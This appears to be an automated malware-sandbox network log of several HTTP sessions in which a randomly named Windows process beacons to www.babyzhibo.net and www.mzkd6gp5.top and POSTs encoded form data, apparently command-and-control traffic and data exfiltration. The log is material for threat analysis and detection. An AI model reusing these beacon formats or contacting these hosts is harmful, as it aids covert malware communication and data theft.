                                                    Data Ascii: d404 Not Found0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    20192.168.2.650009192.186.58.31806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:35:59.157665014 CET516OUTGET /wn9b/?CviT=vboslbB2+fPQbuQgZEku0U8Mit34kv6hkjEO/9jYS6JieTwBpMMlA1+GJuZnlONOskCea7euAeJ8nc5JKxSpmkXrUEu+S/eo/p+L/n9ML9zYgduzowjOe25j+nYWtjJhKH1IZis=&YFCLW=BxgTctSh HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.babyzhibo.net
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Jan 13, 2025 09:36:00.141891956 CET1236INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Mon, 13 Jan 2025 08:35:59 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Data Raw: 66 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 63 6d 6e 2d 48 61 6e 73 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 26 23 32 32 33 30 33 3b 26 23 33 35 39 34 36 3b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 31 39 39 37 39 3b 26 23 33 36 37 33 33 3b 26 23 32 33 34 33 33 3b 26 23 33 35 30 31 33 3b 26 23 32 35 31 36 33 3b 26 23 32 36 34 32 36 3b 26 23 32 39 32 35 36 3b 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 32 33 30 33 3b 26 23 33 35 39 34 36 3b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 ef b8 8f f0 9f 95 9b 26 23 32 37 34 32 36 3b 26 23 33 36 38 31 34 3b 26 23 32 30 33 35 31 3b 26 23 32 39 39 39 32 3b f0 9f 8e a2 26 23 32 32 33 30 33 3b 26 23 33 35 39 [TRUNCATED]
                                                    Data Ascii: ffc0<!DOCTYPE html><html lang="zh-cmn-Hans"><head><title>&#22303;&#35946;&#30452;&#25773;&#20813;&#36153;&#19979;&#36733;&#23433;&#35013;&#25163;&#26426;&#29256;</title><meta http-equiv="keywords" content="&#22303;&#35946;&#30452;&#25773;"><meta http-equiv="description" content="&#27426;&#36814;&#20351;&#29992;&#22303;&#35946;&#30452;&#25773;&#25903;&#25345;:32/64bit&#25105;&#20204;&#20026;&#24744;&#25552;&#20379;:&#30495;&#20154;,&#26827;/&#29260;&#20307;&#32946;,&#24425;/&#31080;&#30005;&#23376;,&#22303;&#35946;&#30452;&#25773;&#26368;&#26032;&#29256;&#26412;&#30452;&#25773;app&#21019;&#24314;&#20110;2005&#24180;&#26368;&#21021;&#21482;&#26159;&#19968;&#20010;&#23567;&#22411;&#30340;&#20307;&#32946;&#36164;&#35759;&#32593;&#31449;&#32463;&#36807;&#22810;&#24180;&#30340;&#21457;&#23637;&#22914;&#20170;&#24050;&#32463;&#25104;&#20026;&#20102;&#22269;&#20869;&#30693;&#21517;&#30340;&#20307;&#32946;&#36187;&#20107;&#25253;&#36947;&#23186;&#20307;&#30340;&#210 [TRUNCATED]
                                                    Jan 13, 2025 09:36:00.141910076 CET1236INData Raw: 26 23 32 38 39 30 39 3b 26 23 32 39 32 33 33 3b 26 23 32 30 33 30 37 3b 26 23 33 32 39 34 36 3b 26 23 33 30 33 34 30 3b 26 23 32 34 31 38 30 3b 26 23 33 36 37 33 31 3b 26 23 32 30 31 35 34 3b ef bc 8c 26 23 32 30 31 38 32 3b 26 23 32 30 32 30 34
                                                    Data Ascii: &#28909;&#29233;&#20307;&#32946;&#30340;&#24180;&#36731;&#20154;&#20182;&#20204;&#28145;&#30693;&#20307;&#32946;&#22312;&#20154;&#20204;&#29983;&#27963;&#20013;&#30340;&#37325;&#35201;&#24615;&#24076;&#26395;&#36890;&#36807;&#20026;&#
                                                    Jan 13, 2025 09:36:00.141926050 CET1236INData Raw: 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 61 62 79 7a 68 69 62 6f 2e 6e 65 74 2f 74 65 6d 70 6c 61 74 65 2f 6e 65 77 73 2f 77 61 6e 64 6f 75 6a 69 61 2f 73 74
                                                    Data Ascii: "><link rel="stylesheet" href="http://www.babyzhibo.net/template/news/wandoujia/static/css/appsdetail.6f4104a5611f3a6cc38f23add3deb034.css"></head><body cache-app-id="12685" data-app-id="94468" data-track="" data-suffix="" data-title="&#22303;
                                                    Jan 13, 2025 09:36:00.141948938 CET1236INData Raw: 74 68 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f
                                                    Data Ascii: th.js" crossorigin="anonymous"></script><script type="text/javascript" src="http://www.babyzhibo.net/template/news/wandoujia/static/js/nc.js"></script><script type="text/javascript" src="http://www.babyzhibo.net/template/news/wandoujia/static/
                                                    Jan 13, 2025 09:36:00.141964912 CET1236INData Raw: 22 64 65 74 61 69 6c 22 3e 3c 2f 66 6f 72 6d 3e 3c 74 74 20 64 72 61 67 67 61 62 6c 65 3d 22 62 64 65 39 63 64 22 3e 3c 2f 74 74 3e 3c 76 61 72 20 64 72 6f 70 7a 6f 6e 65 3d 22 65 36 35 31 38 36 22 3e 3c 2f 76 61 72 3e 3c 61 72 65 61 20 64 61 74
                                                    Data Ascii: "detail"></form><tt draggable="bde9cd"></tt><var dropzone="e65186"></var><area date-time="14251e"></area><div lang="3d7afd" class="lc227f user-info"><img draggable="426ecd" class="m9dfbf avatar" id="header_avatar" src="http://www.babyzhibo.net
                                                    Jan 13, 2025 09:36:00.141979933 CET1236INData Raw: 3d 22 61 30 39 30 38 38 20 20 6e 61 76 2d 69 74 65 6d 22 3e 3c 61 20 63 6c 61 73 73 3d 22 62 32 31 33 64 39 20 66 69 72 73 74 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 2f 73 70 65 63 69 61 6c 22 3e 3c 73 70 61 6e 3e e4 b8 93 e9 a2 98 3c 2f 73 70 61
                                                    Data Ascii: ="a09088 nav-item"><a class="b213d9 first-link" href="/special"><span></span></a></li><li class="c94c69 nav-item"><a class="d5b01b first-link" href="/award"><span></span></a></li><li class="ea7252 nav-item"><a class="fae356 f
                                                    Jan 13, 2025 09:36:00.141993046 CET776INData Raw: aa e5 8a a8 e5 88 9b e5 bb ba e8 b4 a6 e5 8f b7 3c 2f 64 69 76 3e 3c 61 72 65 61 20 6c 61 6e 67 3d 22 63 36 37 66 39 32 22 3e 3c 2f 61 72 65 61 3e 3c 6d 61 70 20 64 72 61 67 67 61 62 6c 65 3d 22 39 65 65 31 66 37 22 3e 3c 2f 6d 61 70 3e 3c 62 64
                                                    Data Ascii: </div><area lang="c67f92"></area><map draggable="9ee1f7"></map><bdo dropzone="45a73c"></bdo><div date-time="bc0df0" class="o57a0d input-wrap"><input type="text" id="login_phone" class="p0b100 inner-input" placeholder="
                                                    Jan 13, 2025 09:36:00.142008066 CET1236INData Raw: 6d 62 65 72 22 20 69 64 3d 22 6c 6f 67 69 6e 5f 63 6f 64 65 22 20 63 6c 61 73 73 3d 22 75 30 31 37 66 65 20 69 6e 6e 65 72 2d 69 6e 70 75 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 e8 af b7 e8 be 93 e5 85 a5 e6 89 8b e6 9c ba e9 aa 8c e8 af
                                                    Data Ascii: mber" id="login_code" class="u017fe inner-input" placeholder=""><span id="login_getCode" class="v516b9 verify-btn active"></span></div><map dropzone="aaf0a2"></map><bdo date-time="ab7c9b"></bdo><dfn dir="
                                                    Jan 13, 2025 09:36:00.142024040 CET1236INData Raw: 65 3d 22 34 39 63 63 63 63 22 3e 3c 2f 73 6d 61 6c 6c 3e 3c 73 75 70 20 64 69 72 3d 22 35 33 65 32 34 66 22 3e 3c 2f 73 75 70 3e 3c 64 69 76 20 64 72 6f 70 7a 6f 6e 65 3d 22 39 30 66 36 35 63 22 20 69 64 3d 22 75 73 65 72 5f 6d 6f 64 61 6c 22 20
                                                    Data Ascii: e="49cccc"></small><sup dir="53e24f"></sup><div dropzone="90f65c" id="user_modal" class="c447db user-modal"><time lang="324711"></time><tt draggable="bb8c8e"></tt><var dropzone="d9466e"></var><div date-time="624654" class="d8ff6a modal-wrap pc
                                                    Jan 13, 2025 09:36:00.142039061 CET1236INData Raw: 69 6d 65 3d 22 31 32 65 64 38 38 22 3e 3c 2f 66 6f 6e 74 3e 3c 69 6e 73 20 64 69 72 3d 22 66 61 61 38 65 33 22 3e 3c 2f 69 6e 73 3e 3c 73 6d 61 6c 6c 20 6c 61 6e 67 3d 22 66 30 37 31 66 33 22 3e 3c 2f 73 6d 61 6c 6c 3e 3c 64 69 76 20 6c 61 6e 67
                                                    Data Ascii: ime="12ed88"></font><ins dir="faa8e3"></ins><small lang="f071f3"></small><div lang="022696" class="l51622 container" itemscope=""><meta content="http://www.yuehaizhibo.net" itemprop="url"><sup draggable="680eb3"></sup><time dropzone="ed5456"><
                                                    Jan 13, 2025 09:36:00.146886110 CET1236INData Raw: 73 73 3d 22 73 66 36 62 35 33 20 63 72 75 6d 62 2d 68 31 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 74 62 61 64 64 33 20 63 75 72 72 65 6e 74 22 3e 26 23 32 32 33 30 33 3b 26 23 33 35 39 34 36 3b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b
                                                    Data Ascii: ss="sf6b53 crumb-h1"><span class="tbadd3 current">&#22303;&#35946;&#30452;&#25773;</span></h1></div></div><time date-time="336a5d"></time><tt dir="fbb2e6"></tt><var lang="189ea1"></var><div lang="ea1cfd" class="u8eca1 detail-wrap"><area


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    21192.168.2.650010104.21.16.1806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:36:06.398170948 CET772OUTPOST /utww/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.mzkd6gp5.top
                                                    Origin: http://www.mzkd6gp5.top
                                                    Referer: http://www.mzkd6gp5.top/utww/
                                                    Cache-Control: no-cache
                                                    Content-Length: 209
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Raw: 43 76 69 54 3d 67 6e 37 51 66 6b 4e 30 52 43 4e 4d 75 79 57 46 49 64 36 46 6c 4f 6c 4c 4a 52 75 67 51 6e 45 71 36 32 53 77 6a 56 73 4f 7a 42 39 49 37 37 7a 36 2f 7a 58 59 6f 31 64 77 32 43 38 39 4d 6f 45 2b 33 31 78 6c 58 51 72 64 74 58 31 32 64 43 77 34 34 4a 33 31 33 4b 38 4b 4f 4c 7a 6d 2f 48 63 4f 78 46 31 7a 70 63 34 69 6e 50 78 4f 45 5a 52 54 49 50 63 69 39 57 6c 33 65 62 71 63 42 55 68 63 4c 55 4c 2b 62 52 32 7a 35 4b 66 50 36 59 68 56 66 42 76 65 39 33 57 74 69 4e 42 47 7a 36 6d 38 5a 52 52 72 61 56 4d 66 64 30 51 42 62 76 55 76 37 33 49 32 49 4c 72 58 77 63 57 4f 74 76 53 79 55 50 50 6e 4e 49 41 37 65 45 37 66
                                                    Data Ascii: CviT=gn7QfkN0RCNMuyWFId6FlOlLJRugQnEq62SwjVsOzB9I77z6/zXYo1dw2C89MoE+31xlXQrdtX12dCw44J313K8KOLzm/HcOxF1zpc4inPxOEZRTIPci9Wl3ebqcBUhcLUL+bR2z5KfP6YhVfBve93WtiNBGz6m8ZRRraVMfd0QBbvUv73I2ILrXwcWOtvSyUPPnNIA7eE7f
                                                    Jan 13, 2025 09:36:07.298295975 CET970INHTTP/1.1 404 Not Found
                                                    Date: Mon, 13 Jan 2025 08:36:07 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RC2qw032OEnNs%2BmHTjkFpusK2%2FpAfFZhhfvEXxqZxN7IbuYilUOenkXrwRJbtV9%2BGxaiUjJL0YiOz%2B3kIp35M2FXX4nsqXFLxurg5V2cLZKhVkM6m6hd01ybBlGMM5Q7nQhr"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 90140e867f2f8ce0-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1767&rtt_var=883&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=772&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    22192.168.2.650011104.21.16.1806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:36:08.946518898 CET796OUTPOST /utww/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.mzkd6gp5.top
                                                    Origin: http://www.mzkd6gp5.top
                                                    Referer: http://www.mzkd6gp5.top/utww/
                                                    Cache-Control: no-cache
                                                    Content-Length: 233
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Raw: 43 76 69 54 3d 67 6e 37 51 66 6b 4e 30 52 43 4e 4d 38 43 6d 46 4b 2b 53 46 30 2b 6c 49 51 68 75 67 4c 33 46 68 36 32 65 77 6a 55 6f 65 79 7a 5a 49 37 65 50 36 2b 79 58 59 74 31 64 77 35 69 38 79 43 49 45 6c 33 31 30 50 58 56 72 64 74 58 68 32 64 43 41 34 34 2b 6a 32 32 61 38 49 47 72 7a 6b 69 58 63 4f 78 46 31 7a 70 63 45 49 6e 50 70 4f 45 70 68 54 4f 64 31 51 7a 32 6c 32 5a 62 71 63 58 55 68 59 4c 55 4c 63 62 54 4f 5a 35 49 6e 50 36 63 6c 56 66 77 76 64 79 33 57 76 73 74 41 47 32 4c 2f 72 51 67 5a 72 59 30 6b 6c 64 56 4d 59 65 5a 4a 31 6e 45 49 56 61 62 4c 56 77 65 4f 38 74 50 53 59 57 50 33 6e 66 66 4d 63 52 77 65 38 67 7a 66 6c 6a 61 30 39 67 74 4a 79 4e 49 61 44 76 4b 6d 77 46 51 3d 3d
                                                    Data Ascii: CviT=gn7QfkN0RCNM8CmFK+SF0+lIQhugL3Fh62ewjUoeyzZI7eP6+yXYt1dw5i8yCIEl310PXVrdtXh2dCA44+j22a8IGrzkiXcOxF1zpcEInPpOEphTOd1Qz2l2ZbqcXUhYLULcbTOZ5InP6clVfwvdy3WvstAG2L/rQgZrY0kldVMYeZJ1nEIVabLVweO8tPSYWP3nffMcRwe8gzflja09gtJyNIaDvKmwFQ==
                                                    Jan 13, 2025 09:36:09.838385105 CET980INHTTP/1.1 404 Not Found
                                                    Date: Mon, 13 Jan 2025 08:36:09 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AeNl2hckcJYVSxWr37%2FQLF6aX8xIag%2Fdkg%2FtqmU00yrE%2B0b7KCkQpWd2pY7nrskp12m9%2FlcVpG4L6jAdG93%2B8jr%2FOjl6gfmJynCtKa48Dhei%2FGbAHwD0GsB1WKrDaRPD7%2BNT"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 90140e96584b1899-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1695&rtt_var=847&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=796&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    23192.168.2.650012104.21.16.1806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:36:11.491955042 CET1809OUTPOST /utww/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.mzkd6gp5.top
                                                    Origin: http://www.mzkd6gp5.top
                                                    Referer: http://www.mzkd6gp5.top/utww/
                                                    Cache-Control: no-cache
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Raw: 43 76 69 54 3d 67 6e 37 51 66 6b 4e 30 52 43 4e 4d 38 43 6d 46 4b 2b 53 46 30 2b 6c 49 51 68 75 67 4c 33 46 68 36 32 65 77 6a 55 6f 65 79 7a 52 49 37 4c 44 36 2b 52 2f 59 71 31 64 77 77 43 38 78 43 49 46 33 33 31 4d 55 58 56 57 71 74 56 5a 32 63 68 49 34 6f 50 6a 32 34 61 38 49 4b 4c 7a 70 2f 48 63 58 78 42 51 36 70 63 30 49 6e 50 70 4f 45 72 35 54 66 50 64 51 6a 47 6c 33 65 62 71 51 42 55 68 6b 4c 51 65 6a 62 54 4b 6a 36 34 48 50 39 34 42 56 59 57 54 64 37 33 57 70 68 4e 41 6f 32 4c 43 73 51 67 55 59 59 30 67 44 64 58 51 59 65 65 30 30 32 41 51 34 50 4b 4f 7a 70 4a 75 66 67 72 65 52 59 74 6a 42 55 38 42 6f 54 51 61 54 6c 32 44 68 33 59 74 43 75 2f 31 63 55 50 6e 31 74 5a 37 63 5a 63 31 58 32 77 47 79 70 6f 31 57 7a 62 6a 4c 34 66 56 54 54 6c 39 4a 49 78 39 63 41 70 6a 49 4b 55 43 47 38 74 53 6d 67 52 54 68 66 71 2f 78 6e 61 49 2f 74 37 39 75 50 64 51 58 65 75 35 6d 48 58 4b 4f 75 77 54 59 62 79 55 31 76 79 58 68 73 41 50 58 33 52 32 79 67 62 46 65 42 7a 4c 73 55 67 77 71 54 79 30 71 64 69 34 63 6d [TRUNCATED]
                                                    Data Ascii: CviT=gn7QfkN0RCNM8CmFK+SF0+lIQhugL3Fh62ewjUoeyzRI7LD6+R/Yq1dwwC8xCIF331MUXVWqtVZ2chI4oPj24a8IKLzp/HcXxBQ6pc0InPpOEr5TfPdQjGl3ebqQBUhkLQejbTKj64HP94BVYWTd73WphNAo2LCsQgUYY0gDdXQYee002AQ4PKOzpJufgreRYtjBU8BoTQaTl2Dh3YtCu/1cUPn1tZ7cZc1X2wGypo1WzbjL4fVTTl9JIx9cApjIKUCG8tSmgRThfq/xnaI/t79uPdQXeu5mHXKOuwTYbyU1vyXhsAPX3R2ygbFeBzLsUgwqTy0qdi4cmpd7aXiKiW3eG3AoaUZGYP7+w4WdpOTDOwlBzfpjrajgG1bZJAwCZ7ervVDsqkBl7CHW1sxgrNGAwV2d8W0KnxQ/Jh2X8RKaSiiHfCOjixpHJUHtxfvDXD6GlqBlKhI4q9ugUmX/4NHa7eMCUrdGDJR6gY9815bqPpKpPB2g6ThWBaqUaE5y3ZHcjBtb0+sp4m4wZJs8/5BlP06ToSp8/zlVnhGL1eChV2FugYykNtXbzl1GsJ/wa1H3nQoMQYKm1WtBqQJGwCoCbiqsOsvI4MQKTuQxuRmXgMsbFFDxiRkU463HWcWUNeV8gIbx9pccORwi3D8DCXyP8qh/vgyHv63LRRIvi1IWaqXSqG+bWiyKFiHMa8jvEMUicBDoXr9HP7Pg1L+Zy8TVdGyoMxJWr4pXwRU9DCrMGw0a/veYZvkeJXMfuCvFEpadyb5zR4uCEfWQi4YFdhPYfMFJxr+IZl0Y/+qVdh+qG1uto3LJFE3aumWqRSvrhM7Na1ximPZN4TsewlCKdTrfmXbuQt+qmoFOQDyLAESDgjclrfjaDzddE2ROrQO1co8Nw+LR/8nT+CpnrDGOFns0Yc7T+kyjEOAqre4wtiw0P6MBIObWZB0jisfso0p7kk5v1nFU83I0j5Yn+jUhEXFJpJ6kBm26nfWiU4dqp1opXVh [TRUNCATED]
                                                    Jan 13, 2025 09:36:12.416405916 CET975INHTTP/1.1 404 Not Found
                                                    Date: Mon, 13 Jan 2025 08:36:12 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0mAv7VSk0SO4%2B5zlY6rnMYxnYfjjvDHA6b%2FXrG4qjNN8I6P0EL6UbW%2Fo%2F9DW0ugn6fAmvBcEDZmiZwDI84%2F5943lLf0HYOvYC51M6eY9GuynBYwUxvDh%2B2I8RFqyvnfUyrw1"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 90140ea659960fa8-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1433&min_rtt=1433&rtt_var=716&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1809&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    24192.168.2.650013104.21.16.1806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:36:14.033524036 CET515OUTGET /utww/?YFCLW=BxgTctSh&CviT=tlTwcU9ZWjUkkDOfL8m8hKdUQz2PcyBI6lKxmlk4uDhIu7zh7TbGiDYhoS5CKbA93kURRma0w2BXBhIfz9bvypQbFpT5jG8x4isXk855maVsJaNYXMtMyHgYaLu1BwVeMhPbSn8= HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.mzkd6gp5.top
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Jan 13, 2025 09:36:14.943185091 CET1236INHTTP/1.1 404 Not Found
                                                    Date: Mon, 13 Jan 2025 08:36:14 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fdjmh9Mh8xzsQjUIEsH53RNr4aDLOsqBF%2BZ4Esstoz5GPkA2JlAtvNo%2BbdwariWa8UHITWiBuM03tjddz62ymvkTOGMj0rshp1svyMvFA%2BpkmKLyTA2WpdUWQO%2BXy18JXDwE"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 90140eb64e7d1899-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1579&rtt_var=789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=515&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
